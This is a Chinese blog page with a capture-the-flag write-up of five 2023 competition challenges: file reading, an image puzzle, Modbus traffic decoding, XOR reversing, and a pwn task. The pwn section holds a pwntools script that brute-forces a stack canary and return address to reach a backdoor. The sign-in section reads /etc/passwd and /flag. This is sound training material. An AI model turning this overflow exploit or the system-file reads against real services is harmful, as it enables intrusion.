<!DOCTYPE html><html lang="zh-CN" theme-mode="dark"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>23国赛WP | 未来大pwn子的blog</title><link rel="icon" type="image/x-icon" href="/favicon.ico"><link rel="preload" as="font" crossorigin="anonymous" href="/font/Bender.ttf"><link rel="preload" as="font" crossorigin="anonymous" href="/font/BenderLight.ttf"><link rel="preload" as="font" crossorigin="anonymous" href="/font/JetBrainsMono-Regular.woff2"><link rel="stylesheet" href="/css/arknights.css"><style>@font-face {
  font-family: Bender;
  src: local('Bender'), url("/font/Bender.ttf"), url("/font/Bender.otf");
}
@font-face {
  font-family: BenderLight;
  src: local('BenderLight'), url("/font/BenderLight.ttf");
}
@font-face {
  font-family: 'JetBrains Mono';
  src: local('JetBrains Mono'), url('/font/JetBrainsMono-Regular.woff2') format('woff2');
}
</style><script>var config = {"root":"/","search":{"preload":false,"activeHolder":"Enter here","blurHolder":"Search","noResult":"Data \"$0\" not found"},"code":{"codeInfo":"$0 - $1 lines","copy":"copy"}}</script><link type="text/css" rel="stylesheet" href="/lib/encrypt/hbe.style.css"><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lightgallery.css"><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lg-zoom.css"><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lg-thumbnail.css"><link type="text/css" rel="stylesheet" href="/lib/fontawesome/css/all.min.css"><script>if (window.localStorage.getItem('theme-mode') === 'light')
 document.documentElement.setAttribute('theme-mode', 'light')
if (window.localStorage.getItem('theme-mode') === 'dark')
 document.documentElement.setAttribute('theme-mode', 'dark')</script><style>:root {
 --dark-background: url('https://ak.hypergryph.com/assets/index/images/ak/pc/bk.jpg');
 --light-background: url('/img/bk.jpg');
 --theme-encrypt-confirm: 'confirm'
}</style><script defer src="/js/arknights.js"></script><script defer src="/js/search.js"></script><script defer type="module">import mermaid from '//unpkg.com/mermaid@10.5.0/dist/mermaid.esm.mjs';
window.mermaid = mermaid;
code.paintMermaid();
</script><script async src="//unpkg.com/lightgallery@2.7.1/lightgallery.min.js"></script><script async src="//unpkg.com/lightgallery@2.7.1/plugins/zoom/lg-zoom.min.js"></script><script async src="//unpkg.com/lightgallery@2.7.1/plugins/thumbnail/lg-thumbnail.min.js"></script><script async src="/lib/encrypt/hbe.js"></script><script async src="/js/pjax.js"></script><script class="pjax-js">reset= () => {document.querySelector('.lg-container')?.remove()
lightGallery(document.getElementById('post-bg'), {
  plugins: [lgZoom,lgThumbnail],
  selector: '.item-img'})}</script><script>window.addEventListener("load",() => {pjax = new Pjax({
 cacheBust: false,
 selectors: ['title','article','#aside-block','.pjax-js','data-pjax','.busuanzi'],
 switches: {'article': Pjax.switches.sideBySide},
 switchesOptions: {
   'article': {
     classNames: {
       remove: "pjax-out",
       add: "pjax-in"
     }
   }
 }
});
document.addEventListener("pjax:complete", reset);reset()})</script><meta name="generator" content="Hexo 7.0.0"></head><body><div class="loading" style="opacity: 0;"><div class="loadingBar left"></div><div class="loadingBar right"></div></div><main><header class="closed"><div class="navBtn"><i class="navBtnIcon"><span class="navBtnIconBar"></span><span class="navBtnIconBar"></span><span class="navBtnIconBar"></span></i></div><nav><div class="navItem" id="search-header"><span class="navItemTitle"><input autocomplete="off" autocorrect="off" autocapitalize="none" placeholder="Search" spellcheck="false" maxlength="50" type="text" id="search-input"></span></div><div class="navItem" id="search-holder"></div><div class="search-popup" tabindex="0"><div id="search-result"></div></div><ol class="navContent"><li class="navItem"><a class="navBlock" href="/"><span class="navItemTitle">Home</span></a></li><li class="navItem" matchdata="categories,tags"><a class="navBlock" href="/archives/"><span class="navItemTitle">Archives</span></a></li></ol></nav></header><article><div id="post-bg"><div id="post-title"><h1>23国赛WP</h1><div id="post-info"><span>First Post: <div class="control"><time datetime="2023-07-23T13:21:31.000Z" id="date"> 2023-07-23</time></div></span><br><span>Last Update: <div class="control"><time datetime="2023-09-21T02:49:10.525Z" id="updated"> 2023-09-21</time></div></span></div></div><hr><div id="post-content"><h1 id="签到题"><a href="#签到题" class="headerlink" title="签到题"></a>签到题</h1><p>输错代码后，会看到官方提示：</p>
<blockquote>
<p>python3打印文件内容：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">print</span>(<span class="built_in">open</span>(<span class="string">&#x27;/etc/passwd&#x27;</span>).read())</span><br></pre></td></tr></table></figure>
</blockquote>
<p>可以猜测是需要通过输入代码打开什么文件，索性尝试<code>/flag</code>，输入<code>print(open(&#39;/flag&#39;).read())</code>结果如下：</p>
<p class='item-img' data-src='/images_of_guosai/1.png'><img src="/images_of_guosai/1.png" alt="1" title="1.png"></p>
<p>获得<code>flag&#123;Od2e2ea0-0896-4ee6-a925-09acee3db3a9&#125;&#125;</code></p>
<h1 id="国粹"><a href="#国粹" class="headerlink" title="国粹"></a>国粹</h1><p>题干：</p>
<p class='item-img' data-src='/images_of_guosai/a.png'><img src="/images_of_guosai/a.png" alt="a" title="a.png"></p>
<p class='item-img' data-src='/images_of_guosai/k-1685203207698-6.png'><img src="/images_of_guosai/k-1685203207698-6.png" alt="k-1685203207698-6" title="k-1685203207698-6"></p>
<p>可以看到最后两张图长度相同，对齐后有一定的规律</p>
<ul>
<li><p>第一行相同牌面对应第二行的牌面没有重复的</p>
</li>
<li><p>第一行相同的牌面，第二行对应的牌面按照一定的顺序排列：</p>
<ul>
<li><p>一万 到 九万</p>
</li>
<li><p>一饼 到 九饼</p>
</li>
<li><p>一条 到 九条</p>
</li>
<li><p>东南西北风</p>
</li>
<li><p>中发白</p>
</li>
<li><p>春夏秋冬</p>
</li>
<li><p>梅兰竹菊</p>
</li>
</ul>
</li>
</ul>
<p>同时题干图片中第一行第一个为空白第二行以一个为一万，可以联想到坐标轴，</p>
<p>于是尝试将<code>(a,k)</code>对应的各个点描出：</p>
<p class='item-img' data-src='/images_of_guosai/galf.jpg'><img src="/images_of_guosai/galf.jpg" alt="galf" title="galf.jpg"></p>
<p>可以隐约发现<code>flag&#123;&#125;</code>，对图片进行翻转操作后：</p>
<p class='item-img' data-src='/images_of_guosai/flag.png'><img src="/images_of_guosai/flag.png" alt="flag" title="flag.png"></p>
<p>最后获得<code>flag&#123;202305012359&#125;</code></p>
<h1 id="Modbus"><a href="#Modbus" class="headerlink" title="Modbus"></a>Modbus</h1><p>题目为一个流量包，根据题干提示（还有高人指点），筛选<code>modbus</code>协议的流量包：</p>
<p class='item-img' data-src='/images_of_guosai/image-20230528001734661.png'><img src="/images_of_guosai/image-20230528001734661.png" alt="image-20230528001734661"></p>
<p>注意最后的<code>Word Count</code>，将前14个流量包对应的十六进制提取出来拼接获得</p>
<p><code>MMYWMX3GNEYWOXZRGAYDA===</code>，再通过Base32解码获得<code>c1f_fi1g_1000</code>.</p>
<p>于是<code>flag&#123;c1f_fi1g_1000&#125;</code>（本题一直摸鱼，全靠队友:joy:）</p>
<h1 id="Babyre"><a href="#Babyre" class="headerlink" title="Babyre"></a>Babyre</h1><p>打开附件<code>babyre.xml</code>可以看到<code>https://snap.berkeley.edu</code>访问将文件导入：</p>
<p>查看关键元素（lock）代码：</p>
<p class='item-img' data-src='/images_of_guosai/image-20230528165854609.png'><img src="/images_of_guosai/image-20230528165854609.png" alt="image-20230528165854609"></p>
<p>尝试运行（注意在设置中开启JavaScript拓展），发现需要输入一串字符，阅读关键部分代码。</p>
<p class='item-img' data-src='/images_of_guosai/image-20230528170114677.png'><img src="/images_of_guosai/image-20230528170114677.png" alt="image-20230528170114677"></p>
<p>可以看到键入输进去的字符按照Unicode编码相邻异或后得到<code>test</code></p>
<p class='item-img' data-src='/images_of_guosai/image-20230528170213070.png'><img src="/images_of_guosai/image-20230528170213070.png" alt="image-20230528170213070"></p>
<p>对比了<code>test</code>和<code>secret</code>的字符是否相同。</p>
<p>所以先修改程序使其输出<code>secret</code>：</p>
<p class='item-img' data-src='/images_of_guosai/image-20230528170459851.png'><img src="/images_of_guosai/image-20230528170459851.png" alt="image-20230528170459851"></p>
<p>获得如下一串数字：</p>
<p><code>102 10 13 6 28 74 3 1 3 7 85 0 4 75 20 92 92 8 28 25 81 83 7 28 76 88 9 0 29 73 0 86 4 87 87 82 84 85 4 85 87 30</code></p>
<p>根据异或特性，编写逆向程序：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">l=[<span class="number">102</span>,<span class="number">10</span>,<span class="number">13</span>,<span class="number">6</span>,<span class="number">28</span>,<span class="number">74</span>,<span class="number">3</span>,<span class="number">1</span>,<span class="number">3</span>,<span class="number">7</span>,<span class="number">85</span>,<span class="number">0</span>,<span class="number">4</span>,<span class="number">75</span>,<span class="number">20</span>,<span class="number">92</span>,<span class="number">92</span>,<span class="number">8</span>,<span class="number">28</span>,<span class="number">25</span>,<span class="number">81</span>,<span class="number">83</span>,<span class="number">7</span>,<span class="number">28</span>,<span class="number">76</span>,<span class="number">88</span>,<span class="number">9</span>,<span class="number">0</span>,<span class="number">29</span>,<span class="number">73</span>,<span class="number">0</span>,<span class="number">86</span>,<span class="number">4</span>,<span class="number">87</span>,<span class="number">87</span>,<span class="number">82</span>,<span class="number">84</span>,<span class="number">85</span>,<span class="number">4</span>,<span class="number">85</span>,<span class="number">87</span>,<span class="number">30</span>]</span><br><span class="line">c=[<span class="string">&#x27;f&#x27;</span>]</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="built_in">len</span>(l)-<span class="number">1</span>):</span><br><span class="line">    c.append(<span class="built_in">chr</span>(l[i+<span class="number">1</span>]^<span class="built_in">ord</span>(c[i])))</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> c <span class="keyword">in</span> c:</span><br><span class="line">    <span class="built_in">print</span>(c,end=<span class="string">&#x27;&#x27;</span>)</span><br></pre></td></tr></table></figure>

<p>输出结果：</p>
<p><code>flag&#123;12307bbf-9e91-4e61-a900-dd26a6d0ea4c&#125;</code></p>
<h1 id="Funcanary"><a href="#Funcanary" class="headerlink" title="Funcanary"></a>Funcanary</h1><p>​                               </p>
<p>用ida查看代码，发现这是一个利用fork实现无限循环的函数，</p>
<p>同时发现一个后门函数·</p>
<p class='item-img' data-src='/images_of_guosai/image6.png'><img src="/images_of_guosai/image6.png" alt="image6"></p>
<p class='item-img' data-src='/images_of_guosai/image7.png'><img src="/images_of_guosai/image7.png" alt="image7"></p>
<p>  每次会调用shuru函数</p>
<p>查看shuru函数</p>
<p class='item-img' data-src='/images_of_guosai/image9.png'><img src="/images_of_guosai/image9.png" alt="image9"></p>
<p>发现了一个溢出点</p>
<p>查看保护措施</p>
<p class='item-img' data-src='/images_of_guosai/image10.png'><img src="/images_of_guosai/image10.png" alt="image10"></p>
<p class='item-img' data-src='/images_of_guosai/image8.png'><img src="/images_of_guosai/image8.png" alt="image8"></p>
<p>保护全开</p>
<p>查看栈结构</p>
<p class='item-img' data-src='/images_of_guosai/image11.png'><img src="/images_of_guosai/image11.png" alt="image11"></p>
<p>思路明确了，想办法绕开金丝雀值，修改返回地址到后门函数上</p>
<p>而结合无限循环的特性，我可以写一个脚本来逐位爆破canary值，而结合题目的保护设施，后门函数的地址也会变，所以我再写一个爆破脚本，通过最多500次尝试找出正确的后门</p>
<p>Exp：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"></span><br><span class="line">\#coding=utf8</span><br><span class="line"></span><br><span class="line">from pwn import *</span><br><span class="line"></span><br><span class="line">import random</span><br><span class="line"></span><br><span class="line">\# context.log_level = &#x27;debug&#x27;</span><br><span class="line"></span><br><span class="line">\# context.terminal = [&#x27;gnome-terminal&#x27;,&#x27;-x&#x27;,&#x27;bash&#x27;,&#x27;-c&#x27;]</span><br><span class="line"></span><br><span class="line">\# context(arch=&#x27;i386&#x27;,os=&#x27;linux&#x27;)</span><br><span class="line"></span><br><span class="line">p = remote(&#x27;47.93.249.245&#x27;,&#x27;13230&#x27;)</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">canary = b&#x27;\x00&#x27;</span><br><span class="line"></span><br><span class="line">for k in range(7):</span><br><span class="line"></span><br><span class="line">  for i in range(256):</span><br><span class="line"></span><br><span class="line">​    \# print(&quot;正在爆破Canary的第&quot; + str(k+1) + &quot;位&quot;)</span><br><span class="line"></span><br><span class="line">​    \# print(&quot;当前的字符为&quot; + chr(i))</span><br><span class="line"></span><br><span class="line">​    p.recvuntil(b&quot;welcome\n&quot;)</span><br><span class="line"></span><br><span class="line">​    payload = b&#x27;a&#x27; * 104 + canary + p8(i)</span><br><span class="line"></span><br><span class="line">​    \#print(&quot;当前payload为：&quot;, payload)</span><br><span class="line"></span><br><span class="line">​    p.send(b&#x27;a&#x27; * 104 + canary + p8(i))</span><br><span class="line"></span><br><span class="line">​    data = p.recvuntil(b&#x27;fun&#x27;,timeout=0.4)</span><br><span class="line"></span><br><span class="line">​    \# print(data)</span><br><span class="line"></span><br><span class="line">​    if b&quot;fun&quot; in data:</span><br><span class="line"></span><br><span class="line">​      canary += p8(i)</span><br><span class="line"></span><br><span class="line">​      print(b&quot;Canary is: &quot; + canary)</span><br><span class="line"></span><br><span class="line">​      break</span><br><span class="line"></span><br><span class="line">print(b&#x27;can&#x27;,hex(u64(canary)))</span><br><span class="line"></span><br><span class="line">pause()</span><br><span class="line"></span><br><span class="line">context.log_level=&#x27;debug&#x27;</span><br><span class="line"></span><br><span class="line">for k in range(500):</span><br><span class="line"></span><br><span class="line">  p.recvuntil(b&#x27;welcome\n&#x27;)</span><br><span class="line"></span><br><span class="line">  i=random.randint(0,14)</span><br><span class="line"></span><br><span class="line">  payload = b&#x27;A&#x27;*104 +canary+p64(0x7fffffffdddddddd) + p8(0x31)+p8(0x02+i*16)</span><br><span class="line"></span><br><span class="line">  p.send(payload)</span><br></pre></td></tr></table></figure>

<div id="paginator"></div></div><div id="post-footer"><div id="pages"><div class="footer-link" style="width: 50%;text-align:right;border-right:1px #fe2 solid"><a href="/2023/07/23/23%E7%9C%81%E8%B5%9BWP/">← Next 23省赛WP</a></div><div class="footer-link" style="width: 50%;right:1px;border-left:1px #fe2 solid"><a href="/2023/07/23/23%E6%A0%A1%E8%B5%9BWP%EF%BC%88%E5%9C%BA%E4%B8%8A%E6%9C%AA%E8%A7%A3%E5%87%BA%E7%9A%84%E5%87%A0%E4%B8%AApwn%EF%BC%89/">23校赛WP（场上未解出的几个pwn） Prev →</a></div></div></div></div><div class="bottom-btn"><div><a class="i-top" id="to-top" onClick="scrolls.scrolltop();" title="To Top" style="opacity: 0; display: none;">∧ </a><a class="i-index" id="to-index" href="#toc-div" title="To Catalog">≡</a><a class="i-color" id="color-mode" onClick="colorMode.change()" title="Change Theme"></a></div></div></article><aside><div id="about"><a href="/" id="logo"><img src="https://ak.hypergryph.com/assets/index/images/ak/pc/faction/1.png" alt="Logo"></a><h1 id="Dr"><a href="/">heshi906</a></h1><div id="description"><p>大概只有漫不经心 才是唯一的解药</p></div></div><div id="aside-block"><div id="toc-div"><h1>Catalog</h1><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E7%AD%BE%E5%88%B0%E9%A2%98"><span class="toc-number">1.</span> <span class="toc-text">签到题</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%9B%BD%E7%B2%B9"><span class="toc-number">2.</span> <span class="toc-text">国粹</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Modbus"><span class="toc-number">3.</span> <span class="toc-text">Modbus</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Babyre"><span class="toc-number">4.</span> <span class="toc-text">Babyre</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Funcanary"><span class="toc-number">5.</span> <span class="toc-text">Funcanary</span></a></li></ol></div></div><footer><nobr>Published with <a target="_blank" rel="noopener" href="http://hexo.io">Hexo</a></nobr><wbr><nobr> Theme <a target="_blank" rel="noopener" href="https://github.com/Yue-plus/hexo-theme-arknights">Arknights</a></nobr><wbr><nobr> by <a target="_blank" rel="noopener" href="https://github.com/Yue-plus">Yue_plus</a></nobr></footer></aside></main><canvas id="canvas-dust"></canvas></body></html>